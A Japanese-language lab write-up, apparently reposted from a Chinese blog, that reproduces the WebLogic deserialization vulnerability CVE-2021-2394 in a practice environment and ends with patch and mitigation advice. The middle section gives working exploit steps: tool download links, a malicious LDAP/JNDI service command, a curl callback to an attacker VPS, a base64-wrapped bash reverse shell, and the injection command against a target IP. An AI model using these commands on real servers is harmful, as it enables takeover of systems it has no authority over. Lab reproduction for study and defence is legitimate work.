WebLogic デシリアライゼーションの脆弱性再現および悪用ツール (CVE-2021-2394)

1. 脆弱性の概要

Oracle は 2021 年 7 月のセキュリティ更新通知を正式にリリースし、WebLogic コンポーネントに高リスクの脆弱性が存在し、攻撃者が許可なく IIOP および T3 プロトコルを通じて脆弱な WebLogic Server コンポーネントを攻撃できる可能性があることを明らかにしました。攻撃者がこの脆弱性の悪用に成功すると、WebLogic Server が乗っ取られる可能性があります。

これは二次的な逆シリアル化の脆弱性であり、CVE-2020-14756 と CVE-2020-14825 の呼び出しチェーンが結合されて、WebLogic ブラックリストをバイパスする新しい呼び出しチェーンが形成されます。

2. 影響範囲

Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

3. 環境を再現する

   バルフォーカスオンライン射撃場

a6c2b0ddd722484c98bb91cfca855a47.png

4. 脆弱性の再発 

再現には次のツールが必要です。

JDNI インジェクション: https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0 

 悪用: https://download.csdn.net/download/qq_41904294/87667743

射撃場をスタートして環境が整っているか確認する(再現バージョン:12.2.1.3.0)

33b6a91de4224ca0b565c2489565fe8c.png

JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar を使用して悪意のある LDAP サービスを開き、ここでカールを実行させます

命令

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl vpsip" -A vpsip

python3はhttpサービスを開始します

python3 -m http.server 80

エクスプロイトツールを使用した悪意のある注入

 java -jar weblogic\ tools.jar -H 123.58.224.8 -P 30706 -payload 20212394 -jndi ldap://x.x.x.x:1389/xxx

# -H是目标地址(weblogicServerIP) -P是目标端口 -jndl 是开启的ldap服务地址

43a998f9d46a44ccab673137ff4f98ab.png

265e2f1f9a7d4c36b39e1821ffed63fd.png 3965b3e585f74ef984e014a16e684677.png

ご覧のとおり、curl コマンドは正常に実行されました。

リバウンドシェル

 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar が LDAP サービスを開きます

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}" -A VPSip

Swiss Army Knife は事前に監視を開始し、ツールキットを使用してターゲットに LDAP サービスをロードさせ、リバース シェル操作を実行させます。

91d4ba384e6044838e428d55e51e2ea6.png

8d107cfdacf34f1fb54853b52dced2a0.png リバウンドに成功しました。フラグを読み取りました

1a85209fdb834b9f8a5e538cde2d7f57.png

 5. 修理のご提案

パッチアップデート

オラクルは、上記の脆弱性を修正するパッチをリリースしました。公式発表を参照して、影響を受ける製品の更新パッチを適時にダウンロードし、パッチ インストール パッケージ内の Readme ファイルを参照してインストールおよび更新し、長期的な有効性を確保してください。保護。

注: Oracle の公式パッチを利用するには、正規ソフトウェアのライセンス アカウントが必要であり、このアカウントで https://support.oracle.com にログインすると、最新のパッチをダウンロードできます。

一時的な緩和

ユーザーが更新パッチを一時的にインストールできない場合は、次の方法で脆弱性を一時的に保護できます。

(1) T3プロトコルのアクセスを制限する

ユーザーは、T3 プロトコルへのアクセスを制御することで、T3 プロトコルの脆弱性を悪用する攻撃を一時的にブロックできます。WebLogic Server には、weblogic.security.net.ConnectionFilterImpl という名前のデフォルトの接続フィルタが用意されています。この接続フィルタは、すべての受信接続を受け入れます。この接続フィルタを通じてルールを構成し、T3 および T3s プロトコルへのアクセスを制御できます。

(2) IIOPプロトコルを無効にする

ユーザーは、IIOP プロトコルを無効にすることで、IIOP プロトコルの脆弱性を悪用する攻撃をブロックできます。

参考リンク

https://www.oracle.com/security-alerts/cpujul2021.html#AppendixFMW

 

 

 

 

 

おすすめ

転載: blog.csdn.net/qq_41904294/article/details/130033914